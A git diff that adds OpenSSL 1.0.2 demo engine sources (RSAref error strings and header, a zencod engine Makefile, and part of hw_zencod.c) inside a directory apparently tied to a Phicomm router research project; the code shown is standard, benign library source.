+    {RSAREF_R_KEY, "key"},
+    {RSAREF_R_KEY_ENCODING, "key encoding"},
+    {RSAREF_R_LEN, "len"},
+    {RSAREF_R_LENGTH_NOT_BLOCK_ALIGNED, "length not block aligned"},
+    {RSAREF_R_MODULUS_LEN, "modulus len"},
+    {RSAREF_R_NEED_RANDOM, "need random"},
+    {RSAREF_R_PRIVATE_KEY, "private key"},
+    {RSAREF_R_PUBLIC_KEY, "public key"},
+    {RSAREF_R_SIGNATURE, "signature"},
+    {RSAREF_R_SIGNATURE_ENCODING, "signature encoding"},
+    {RSAREF_R_UNKNOWN_FAULT, "unknown fault"},
+    {0, NULL}
+};
+
+#endif
+
+#ifdef RSAREF_LIB_NAME
+static ERR_STRING_DATA RSAREF_lib_name[] = {
+    {0, RSAREF_LIB_NAME},
+    {0, NULL}
+};
+#endif
+
+static int RSAREF_lib_error_code = 0;
+static int RSAREF_error_init = 1;
+
+static void ERR_load_RSAREF_strings(void)
+{
+    if (RSAREF_lib_error_code == 0)
+        RSAREF_lib_error_code = ERR_get_next_error_library();
+
+    if (RSAREF_error_init) {
+        RSAREF_error_init = 0;
+#ifndef OPENSSL_NO_ERR
+        ERR_load_strings(RSAREF_lib_error_code, RSAREF_str_functs);
+        ERR_load_strings(RSAREF_lib_error_code, RSAREF_str_reasons);
+#endif
+
+#ifdef RSAREF_LIB_NAME
+        RSAREF_lib_name->error = ERR_PACK(RSAREF_lib_error_code, 0, 0);
+        ERR_load_strings(0, RSAREF_lib_name);
+#endif
+    }
+}
+
+static void ERR_unload_RSAREF_strings(void)
+{
+    if (RSAREF_error_init == 0) {
+#ifndef OPENSSL_NO_ERR
+        ERR_unload_strings(RSAREF_lib_error_code, RSAREF_str_functs);
+        ERR_unload_strings(RSAREF_lib_error_code, RSAREF_str_reasons);
+#endif
+
+#ifdef RSAREF_LIB_NAME
+        ERR_unload_strings(0, RSAREF_lib_name);
+#endif
+        RSAREF_error_init = 1;
+    }
+}
+
+static void ERR_RSAREF_error(int function, int reason, char *file, int line)
+{
+    if (RSAREF_lib_error_code == 0)
+        RSAREF_lib_error_code = ERR_get_next_error_library();
+    ERR_PUT_error(RSAREF_lib_error_code, function, reason, file, line);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/rsaref/rsaref_err.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/rsaref/rsaref_err.h
new file mode 100644
index 0000000..4356815
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/rsaref/rsaref_err.h
@@ -0,0 +1,110 @@
+/* rsaref_err.h */
+/* ====================================================================
+ * Copyright (c) 1998-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_RSAREF_ERR_H
+# define HEADER_RSAREF_ERR_H
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+static void ERR_load_RSAREF_strings(void);
+static void ERR_unload_RSAREF_strings(void);
+static void ERR_RSAREF_error(int function, int reason, char *file, int line);
+# define RSAREFerr(f,r) ERR_RSAREF_error((f),(r),__FILE__,__LINE__)
+/* Error codes for the RSAREF functions. */
+
+/* Function codes. */
+# define RSAREF_F_BNREF_MOD_EXP                           100
+# define RSAREF_F_CIPHER_DES_CBC_CODE                     112
+# define RSAREF_F_RSAREF_BN2BIN                           101
+# define RSAREF_F_RSAREF_MOD_EXP                          102
+# define RSAREF_F_RSAREF_PRIVATE_DECRYPT                  103
+# define RSAREF_F_RSAREF_PRIVATE_ENCRYPT                  104
+# define RSAREF_F_RSAREF_PUBLIC_DECRYPT                   105
+# define RSAREF_F_RSAREF_PUBLIC_ENCRYPT                   106
+# define RSAREF_F_RSA_BN2BIN                              107
+# define RSAREF_F_RSA_PRIVATE_DECRYPT                     108
+# define RSAREF_F_RSA_PRIVATE_ENCRYPT                     109
+# define RSAREF_F_RSA_PUBLIC_DECRYPT                      110
+# define RSAREF_F_RSA_PUBLIC_ENCRYPT                      111
+
+/* Reason codes. */
+# define RSAREF_R_CONTENT_ENCODING                        100
+# define RSAREF_R_DATA                                    101
+# define RSAREF_R_DIGEST_ALGORITHM                        102
+# define RSAREF_R_ENCODING                                103
+# define RSAREF_R_ENCRYPTION_ALGORITHM                    104
+# define RSAREF_R_KEY                                     105
+# define RSAREF_R_KEY_ENCODING                            106
+# define RSAREF_R_LEN                                     107
+# define RSAREF_R_LENGTH_NOT_BLOCK_ALIGNED                114
+# define RSAREF_R_MODULUS_LEN                             108
+# define RSAREF_R_NEED_RANDOM                             109
+# define RSAREF_R_PRIVATE_KEY                             110
+# define RSAREF_R_PUBLIC_KEY                              111
+# define RSAREF_R_SIGNATURE                               112
+# define RSAREF_R_SIGNATURE_ENCODING                      113
+# define RSAREF_R_UNKNOWN_FAULT                           115
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/zencod/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/zencod/Makefile
new file mode 100644
index 0000000..5b6a339
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/zencod/Makefile
@@ -0,0 +1,114 @@
+LIBNAME=	libzencod
+SRC=		hw_zencod.c
+OBJ=		hw_zencod.o
+HEADER=		hw_zencod.h
+
+CC=		gcc
+PIC=		-fPIC
+CFLAGS=		-g -I../../../include $(PIC) -DENGINE_DYNAMIC_SUPPORT -DFLAT_INC
+AR=		ar r
+RANLIB=		ranlib
+
+LIB=		$(LIBNAME).a
+SHLIB=		$(LIBNAME).so
+
+all:
+		@echo 'Please choose a system to build on:'
+		@echo ''
+		@echo 'tru64:    Tru64 Unix, Digital Unix, Digital OSF/1'
+		@echo 'solaris:  Solaris'
+		@echo 'irix:     IRIX'
+		@echo 'hpux32:   32-bit HP/UX'
+		@echo 'hpux64:   64-bit HP/UX'
+		@echo 'aix:      AIX'
+		@echo 'gnu:      Generic GNU-based system (gcc and GNU ld)'
+		@echo ''
+
+FORCE.update:
+update:		FORCE.update
+		perl ../../../util/mkerr.pl -conf hw_zencod.ec \
+			-nostatic -staticloader -write hw_zencod.c
+
+gnu:		$(SHLIB).gnu
+tru64:		$(SHLIB).tru64
+solaris:	$(SHLIB).solaris
+irix:		$(SHLIB).irix
+hpux32:		$(SHLIB).hpux32
+hpux64:		$(SHLIB).hpux64
+aix:		$(SHLIB).aix
+
+$(LIB):		$(OBJ)
+		$(AR) $(LIB) $(OBJ)
+		- $(RANLIB) $(LIB)
+
+LINK_SO=	\
+  ld -r -o $(LIBNAME).o $$ALLSYMSFLAGS $(LIB) && \
+  (nm -Pg $(LIBNAME).o | grep ' [BDT] ' | cut -f1 -d' ' > $(LIBNAME).exp; \
+   $$SHAREDCMD $$SHAREDFLAGS -o $(SHLIB) $(LIBNAME).o -L ../../.. -lcrypto -lc)
+
+$(SHLIB).gnu:	$(LIB)
+		ALLSYMSFLAGS='--whole-archive' \
+		SHAREDFLAGS='-shared -Wl,-soname=$(SHLIB)' \
+		SHAREDCMD='$(CC)'; \
+		$(LINK_SO)
+		touch $(SHLIB).gnu
+$(SHLIB).tru64:	$(LIB)
+		ALLSYMSFLAGS='-all' \
+		SHAREDFLAGS='-shared' \
+		SHAREDCMD='$(CC)'; \
+		$(LINK_SO)
+		touch $(SHLIB).tru64
+$(SHLIB).solaris:	$(LIB)
+		ALLSYMSFLAGS='-z allextract' \
+		SHAREDFLAGS='-G -h $(SHLIB)' \
+		SHAREDCMD='$(CC)'; \
+		$(LINK_SO)
+		touch $(SHLIB).solaris
+$(SHLIB).irix:	$(LIB)
+		ALLSYMSFLAGS='-all' \
+		SHAREDFLAGS='-shared -Wl,-soname,$(SHLIB)' \
+		SHAREDCMD='$(CC)'; \
+		$(LINK_SO)
+		touch $(SHLIB).irix
+$(SHLIB).hpux32:	$(LIB)
+		ALLSYMSFLAGS='-Fl' \
+		SHAREDFLAGS='+vnocompatwarnings -b -z +s +h $(SHLIB)' \
+		SHAREDCMD='/usr/ccs/bin/ld'; \
+		$(LINK_SO)
+		touch $(SHLIB).hpux32
+$(SHLIB).hpux64:	$(LIB)
+		ALLSYMSFLAGS='+forceload' \
+		SHAREDFLAGS='-b -z +h $(SHLIB)' \
+		SHAREDCMD='/usr/ccs/bin/ld'; \
+		$(LINK_SO)
+		touch $(SHLIB).hpux64
+$(SHLIB).aix:	$(LIB)
+		ALLSYMSFLAGS='-bnogc' \
+		SHAREDFLAGS='-G -bE:$(LIBNAME).exp -bM:SRE' \
+		SHAREDCMD='$(CC)'; \
+		$(LINK_SO)
+		touch $(SHLIB).aix
+
+depend:
+		sed -e '/^# DO NOT DELETE.*/,$$d' < Makefile > Makefile.tmp
+		echo '# DO NOT DELETE THIS LINE -- make depend depends on it.' >> Makefile.tmp
+		gcc -M $(CFLAGS) $(SRC) >> Makefile.tmp
+		perl ../../../util/clean-depend.pl < Makefile.tmp > Makefile.new
+		rm -f Makefile.tmp Makefile
+		mv Makefile.new Makefile
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+rsaref.o: ../../../include/openssl/asn1.h ../../../include/openssl/bio.h
+rsaref.o: ../../../include/openssl/bn.h ../../../include/openssl/crypto.h
+rsaref.o: ../../../include/openssl/dh.h ../../../include/openssl/dsa.h
+rsaref.o: ../../../include/openssl/e_os2.h ../../../include/openssl/engine.h
+rsaref.o: ../../../include/openssl/err.h ../../../include/openssl/lhash.h
+rsaref.o: ../../../include/openssl/opensslconf.h
+rsaref.o: ../../../include/openssl/opensslv.h
+rsaref.o: ../../../include/openssl/ossl_typ.h ../../../include/openssl/rand.h
+rsaref.o: ../../../include/openssl/rsa.h ../../../include/openssl/safestack.h
+rsaref.o: ../../../include/openssl/stack.h ../../../include/openssl/symhacks.h
+rsaref.o: ../../../include/openssl/ui.h rsaref.c rsaref_err.c rsaref_err.h
+rsaref.o: source/des.h source/global.h source/md2.h source/md5.h source/rsa.h
+rsaref.o: source/rsaref.h
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/zencod/hw_zencod.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/zencod/hw_zencod.c
new file mode 100644
index 0000000..0c0f524
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/zencod/hw_zencod.c
@@ -0,0 +1,1809 @@
+/* crypto/engine/hw_zencod.c */
+ /*
+  * Written by Fred Donnat (frederic.donnat@zencod.com) for "zencod" * engine
+  * integration in order to redirect crypto computing on a crypto * hardware
+  * accelerator zenssl32 ;-) * * Date : 25 jun 2002 * Revision : 17 Ju7 2002
+  * * Version : zencod_engine-0.9.7
+  */
+
+/* ====================================================================
+ * Copyright (c) 1999-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/* ENGINE general include */
+#include <stdio.h>
+#include <openssl/crypto.h>
+#include <openssl/dso.h>
+#include <openssl/engine.h>
+
+#ifndef OPENSSL_NO_HW
+# ifndef OPENSSL_NO_HW_ZENCOD
+
+#  ifdef FLAT_INC
+#   include "hw_zencod.h"
+#  else
+#   include "vendor_defns/hw_zencod.h"
+#  endif
+
+#  define ZENCOD_LIB_NAME "zencod engine"
+#  include "hw_zencod_err.c"
+
+#  define FAIL_TO_SOFTWARE                -15
+
+#  define ZEN_LIBRARY     "zenbridge"
+
+#  if 0
+#   define PERROR(s)     perror(s)
+#   define CHEESE()      fputs("## [ZenEngine] ## " __FUNCTION__ "\n", stderr)
+#  else
+#   define PERROR(s)
+#   define CHEESE()
+#  endif
+
+/* Sorry ;) */
+#  ifndef WIN32
+static inline void esrever(unsigned char *d, int l)
+{
+    for (; --l > 0; --l, d++) {
+        *d ^= *(d + l);
+        *(d + l) ^= *d;
+        *d ^= *(d + l);
+    }
+}
+
+static inline void ypcmem(unsigned char *d, const unsigned char *s, int l)
+{
+    for (d += l; l--;)
+        *--d = *s++;
+}
+#  else
+static __inline void esrever(unsigned char *d, int l)
+{
+    for (; --l > 0; --l, d++) {
+        *d ^= *(d + l);
+        *(d + l) ^= *d;
+        *d ^= *(d + l);
+    }
+}
+
+static __inline void ypcmem(unsigned char *d, const unsigned char *s, int l)
+{
+    for (d += l; l--;)
+        *--d = *s++;
+}
+#  endif
+
+#  define BIGNUM2ZEN(n, bn)       (ptr_zencod_init_number((n), \
+                                        (unsigned long) ((bn)->top * BN_BITS2), \
+                                        (unsigned char *) ((bn)->d)))
+
+#  define ZEN_BITS(n, bytes)      (ptr_zencod_bytes2bits((unsigned char *) (n), (unsigned long) (bytes)))
+#  define ZEN_BYTES(bits) (ptr_zencod_bits2bytes((unsigned long) (bits)))
+
+/* Function for ENGINE detection and control */
+static int zencod_destroy(ENGINE *e);
+static int zencod_init(ENGINE *e);
+static int zencod_finish(ENGINE *e);
+static int zencod_ctrl(ENGINE *e, int cmd, long i, void *p, void (*f) ());
+
+/* BIGNUM stuff */
+static int zencod_bn_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                             const BIGNUM *m, BN_CTX *ctx);
+
+/* RSA stuff */
+#  ifndef OPENSSL_NO_RSA
+static int RSA_zencod_rsa_mod_exp(BIGNUM *r0, const BIGNUM *I, RSA *rsa);
+static int RSA_zencod_bn_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                                 const BIGNUM *m, BN_CTX *ctx,
+                                 BN_MONT_CTX *m_ctx);
+#  endif
+
+/* DSA stuff */
+#  ifndef OPENSSL_NO_DSA
+static int DSA_zencod_bn_mod_exp(DSA *dsa, BIGNUM *r, BIGNUM *a,
+                                 const BIGNUM *p, const BIGNUM *m,
+                                 BN_CTX *ctx, BN_MONT_CTX *m_ctx);
+
+static DSA_SIG *DSA_zencod_do_sign(const unsigned char *dgst, int dlen,
+                                   DSA *dsa);
+static int DSA_zencod_do_verify(const unsigned char *dgst, int dgst_len,
+                                DSA_SIG *sig, DSA *dsa);
+#  endif
+
+/* DH stuff */
+#  ifndef OPENSSL_NO_DH
+static int DH_zencod_bn_mod_exp(const DH *dh, BIGNUM *r, const BIGNUM *a,
+                                const BIGNUM *p, const BIGNUM *m, BN_CTX *ctx,
+                                BN_MONT_CTX *m_ctx);
+static int DH_zencod_generate_key(DH *dh);
+static int DH_zencod_compute_key(unsigned char *key, const BIGNUM *pub_key,
+                                 DH *dh);
+#  endif
+
+/* Rand stuff */
+static void RAND_zencod_seed(const void *buf, int num);
+static int RAND_zencod_rand_bytes(unsigned char *buf, int num);
+static int RAND_zencod_rand_status(void);
+
+/* Digest Stuff */
+static int engine_digests(ENGINE *e, const EVP_MD **digest, const int **nids,
+                          int nid);
+
+/* Cipher Stuff */
+static int engine_ciphers(ENGINE *e, const EVP_CIPHER **cipher,
+                          const int **nids, int nid);
+
+#  define ZENCOD_CMD_SO_PATH                      ENGINE_CMD_BASE
+static const ENGINE_CMD_DEFN zencod_cmd_defns[] = {
+    {ZENCOD_CMD_SO_PATH,
+     "SO_PATH",
+     "Specifies the path to the 'zenbridge' shared library",
+     ENGINE_CMD_FLAG_STRING},
+    {0, NULL, NULL, 0}
+};
+
+#  ifndef OPENSSL_NO_RSA
+/*
+ * Our internal RSA_METHOD specific to zencod ENGINE providing pointers to
+ * our function
+ */
+static RSA_METHOD zencod_rsa = {
+    "ZENCOD RSA method",
+    NULL,
+    NULL,
+    NULL,
+    NULL,
+    RSA_zencod_rsa_mod_exp,
+    RSA_zencod_bn_mod_exp,
+    NULL,
+    NULL,
+    0,
+    NULL,
+    NULL,
+    NULL
+};
+#  endif
+
+#  ifndef OPENSSL_NO_DSA
+/*
+ * Our internal DSA_METHOD specific to zencod ENGINE providing pointers to
+ * our function
+ */
+static DSA_METHOD zencod_dsa = {
+    "ZENCOD DSA method",
+    DSA_zencod_do_sign,
+    NULL,
+    DSA_zencod_do_verify,
+    NULL,
+    DSA_zencod_bn_mod_exp,
+    NULL,
+    NULL,
+    0,
+    NULL
+};
+#  endif
+
+#  ifndef OPENSSL_NO_DH
+/*
+ * Our internal DH_METHOD specific to zencod ENGINE providing pointers to our
+ * function
+ */
+static DH_METHOD zencod_dh = {
+    "ZENCOD DH method",
+    DH_zencod_generate_key,
+    DH_zencod_compute_key,
+    DH_zencod_bn_mod_exp,
+    NULL,
+    NULL,
+    0,
+    NULL
+};
+#  endif
+
+/*
+ * Our internal RAND_meth specific to zencod ZNGINE providing pointers to our
+ * function
+ */
+static RAND_METHOD zencod_rand = {
+    RAND_zencod_seed,
+    RAND_zencod_rand_bytes,
+    NULL,
+    NULL,
+    RAND_zencod_rand_bytes,
+    RAND_zencod_rand_status
+};
+
+/* Constants used when creating the ENGINE */
+static const char *engine_zencod_id = "zencod";
+static const char *engine_zencod_name = "ZENCOD hardware engine support";
+
+/*
+ * This internal function is used by ENGINE_zencod () and possibly by the
+ * "dynamic" ENGINE support too ;-)
+ */
+static int bind_helper(ENGINE *e)
+{
+
+#  ifndef OPENSSL_NO_RSA
+    const RSA_METHOD *meth_rsa;
+#  endif
+#  ifndef OPENSSL_NO_DSA
+    const DSA_METHOD *meth_dsa;
+#  endif
+#  ifndef OPENSSL_NO_DH
+    const DH_METHOD *meth_dh;
+#  endif
+
+    const RAND_METHOD *meth_rand;
+
+    if (!ENGINE_set_id(e, engine_zencod_id) ||
+        !ENGINE_set_name(e, engine_zencod_name) ||
+#  ifndef OPENSSL_NO_RSA
+        !ENGINE_set_RSA(e, &zencod_rsa) ||
+#  endif
+#  ifndef OPENSSL_NO_DSA
+        !ENGINE_set_DSA(e, &zencod_dsa) ||
+#  endif
+#  ifndef OPENSSL_NO_DH
+        !ENGINE_set_DH(e, &zencod_dh) ||
+#  endif
+        !ENGINE_set_RAND(e, &zencod_rand) ||
+        !ENGINE_set_destroy_function(e, zencod_destroy) ||
+        !ENGINE_set_init_function(e, zencod_init) ||
+        !ENGINE_set_finish_function(e, zencod_finish) ||
+        !ENGINE_set_ctrl_function(e, zencod_ctrl) ||
+        !ENGINE_set_cmd_defns(e, zencod_cmd_defns) ||
+        !ENGINE_set_digests(e, engine_digests) ||
+        !ENGINE_set_ciphers(e, engine_ciphers)) {
+        return 0;
+    }
+#  ifndef OPENSSL_NO_RSA
+    /*
+     * We know that the "PKCS1_SSLeay()" functions hook properly to the
+     * Zencod-specific mod_exp and mod_exp_crt so we use those functions. NB:
+     * We don't use ENGINE_openssl() or anything "more generic" because
+     * something like the RSAref code may not hook properly, and if you own
+     * one of these cards then you have the right to do RSA operations on it
+     * anyway!
+     */
+    meth_rsa = RSA_PKCS1_SSLeay();
+
+    zencod_rsa.rsa_pub_enc = meth_rsa->rsa_pub_enc;
+    zencod_rsa.rsa_pub_dec = meth_rsa->rsa_pub_dec;
+    zencod_rsa.rsa_priv_enc = meth_rsa->rsa_priv_enc;
+    zencod_rsa.rsa_priv_dec = meth_rsa->rsa_priv_dec;
+    /* meth_rsa->rsa_mod_exp */
+    /* meth_rsa->bn_mod_exp */
+    zencod_rsa.init = meth_rsa->init;
+    zencod_rsa.finish = meth_rsa->finish;
+#  endif
+
+#  ifndef OPENSSL_NO_DSA
+    /*
+     * We use OpenSSL meth to supply what we don't provide ;-*)
+     */
+    meth_dsa = DSA_OpenSSL();
+
+    /* meth_dsa->dsa_do_sign */
+    zencod_dsa.dsa_sign_setup = meth_dsa->dsa_sign_setup;
+    /* meth_dsa->dsa_do_verify */
+    zencod_dsa.dsa_mod_exp = meth_dsa->dsa_mod_exp;
+    /* zencod_dsa.bn_mod_exp = meth_dsa->bn_mod_exp ; */
+    zencod_dsa.init = meth_dsa->init;
+    zencod_dsa.finish = meth_dsa->finish;
+#  endif
+
+#  ifndef OPENSSL_NO_DH
+    /*
+     * We use OpenSSL meth to supply what we don't provide ;-*)
+     */
+    meth_dh = DH_OpenSSL();
+
+    /* zencod_dh.generate_key = meth_dh->generate_key ; */
+    /* zencod_dh.compute_key = meth_dh->compute_key ; */
+    /* zencod_dh.bn_mod_exp = meth_dh->bn_mod_exp ; */
+    zencod_dh.init = meth_dh->init;
+    zencod_dh.finish = meth_dh->finish;
+
+#  endif
+
+    /*
+     * We use OpenSSL (SSLeay) meth to supply what we don't provide ;-*)
+     */
+    meth_rand = RAND_SSLeay();
+
+    /* meth_rand->seed ; */
+    /* zencod_rand.seed = meth_rand->seed ; */
+    /* meth_rand->bytes ; */
+    /* zencod_rand.bytes = meth_rand->bytes ; */
+    zencod_rand.cleanup = meth_rand->cleanup;
+    zencod_rand.add = meth_rand->add;
+    /* meth_rand->pseudorand ; */
+    /* zencod_rand.pseudorand = meth_rand->pseudorand ; */
+    /* zencod_rand.status = meth_rand->status ; */
+    /* meth_rand->status ; */
+
+    /* Ensure the zencod error handling is set up */
+    ERR_load_ZENCOD_strings();
+    return 1;
+}
+
+/*
+ * As this is only ever called once, there's no need for locking (indeed -
+ * the lock will already be held by our caller!!!)
+ */
+static ENGINE *ENGINE_zencod(void)
+{
+
+    ENGINE *eng = ENGINE_new();
+
+    if (!eng) {
+        return NULL;
+    }
+    if (!bind_helper(eng)) {
+        ENGINE_free(eng);
+        return NULL;
+    }
+
+    return eng;
+}
+
+#  ifdef ENGINE_DYNAMIC_SUPPORT
+static
+#  endif
+void ENGINE_load_zencod(void)
+{
+    /* Copied from eng_[openssl|dyn].c */
+    ENGINE *toadd = ENGINE_zencod();
+    if (!toadd)
+        return;
+    ENGINE_add(toadd);
+    ENGINE_free(toadd);
+    ERR_clear_error();
+}
+
+/*
+ * This is a process-global DSO handle used for loading and unloading the
+ * ZENBRIDGE library. NB: This is only set (or unset) during an * init () or
+ * finish () call (reference counts permitting) and they're * operating with
+ * global locks, so this should be thread-safe * implicitly.
+ */
+static DSO *zencod_dso = NULL;
+
+static t_zencod_test *ptr_zencod_test = NULL;
+static t_zencod_bytes2bits *ptr_zencod_bytes2bits = NULL;
+static t_zencod_bits2bytes *ptr_zencod_bits2bytes = NULL;
+static t_zencod_new_number *ptr_zencod_new_number = NULL;
+static t_zencod_init_number *ptr_zencod_init_number = NULL;
+
+static t_zencod_rsa_mod_exp *ptr_zencod_rsa_mod_exp = NULL;
+static t_zencod_rsa_mod_exp_crt *ptr_zencod_rsa_mod_exp_crt = NULL;
+static t_zencod_dsa_do_sign *ptr_zencod_dsa_do_sign = NULL;
+static t_zencod_dsa_do_verify *ptr_zencod_dsa_do_verify = NULL;
+static t_zencod_dh_generate_key *ptr_zencod_dh_generate_key = NULL;
+static t_zencod_dh_compute_key *ptr_zencod_dh_compute_key = NULL;
+static t_zencod_rand_bytes *ptr_zencod_rand_bytes = NULL;
+static t_zencod_math_mod_exp *ptr_zencod_math_mod_exp = NULL;
+
+static t_zencod_md5_init *ptr_zencod_md5_init = NULL;
+static t_zencod_md5_update *ptr_zencod_md5_update = NULL;
+static t_zencod_md5_do_final *ptr_zencod_md5_do_final = NULL;
+static t_zencod_sha1_init *ptr_zencod_sha1_init = NULL;
+static t_zencod_sha1_update *ptr_zencod_sha1_update = NULL;
+static t_zencod_sha1_do_final *ptr_zencod_sha1_do_final = NULL;
+
+static t_zencod_xdes_cipher *ptr_zencod_xdes_cipher = NULL;
+static t_zencod_rc4_cipher *ptr_zencod_rc4_cipher = NULL;
+
+/*
+ * These are the static string constants for the DSO file name and the
+ * function symbol names to bind to.
+ */
+static const char *ZENCOD_LIBNAME = ZEN_LIBRARY;
+
+static const char *ZENCOD_Fct_0 = "test_device";
+static const char *ZENCOD_Fct_1 = "zenbridge_bytes2bits";
+static const char *ZENCOD_Fct_2 = "zenbridge_bits2bytes";
+static const char *ZENCOD_Fct_3 = "zenbridge_new_number";
+static const char *ZENCOD_Fct_4 = "zenbridge_init_number";
+
+static const char *ZENCOD_Fct_exp_1 = "zenbridge_rsa_mod_exp";
+static const char *ZENCOD_Fct_exp_2 = "zenbridge_rsa_mod_exp_crt";
+static const char *ZENCOD_Fct_dsa_1 = "zenbridge_dsa_do_sign";
+static const char *ZENCOD_Fct_dsa_2 = "zenbridge_dsa_do_verify";
+static const char *ZENCOD_Fct_dh_1 = "zenbridge_dh_generate_key";
+static const char *ZENCOD_Fct_dh_2 = "zenbridge_dh_compute_key";
+static const char *ZENCOD_Fct_rand_1 = "zenbridge_rand_bytes";
+static const char *ZENCOD_Fct_math_1 = "zenbridge_math_mod_exp";
+
+static const char *ZENCOD_Fct_md5_1 = "zenbridge_md5_init";
+static const char *ZENCOD_Fct_md5_2 = "zenbridge_md5_update";
+static const char *ZENCOD_Fct_md5_3 = "zenbridge_md5_do_final";
+static const char *ZENCOD_Fct_sha1_1 = "zenbridge_sha1_init";
+static const char *ZENCOD_Fct_sha1_2 = "zenbridge_sha1_update";
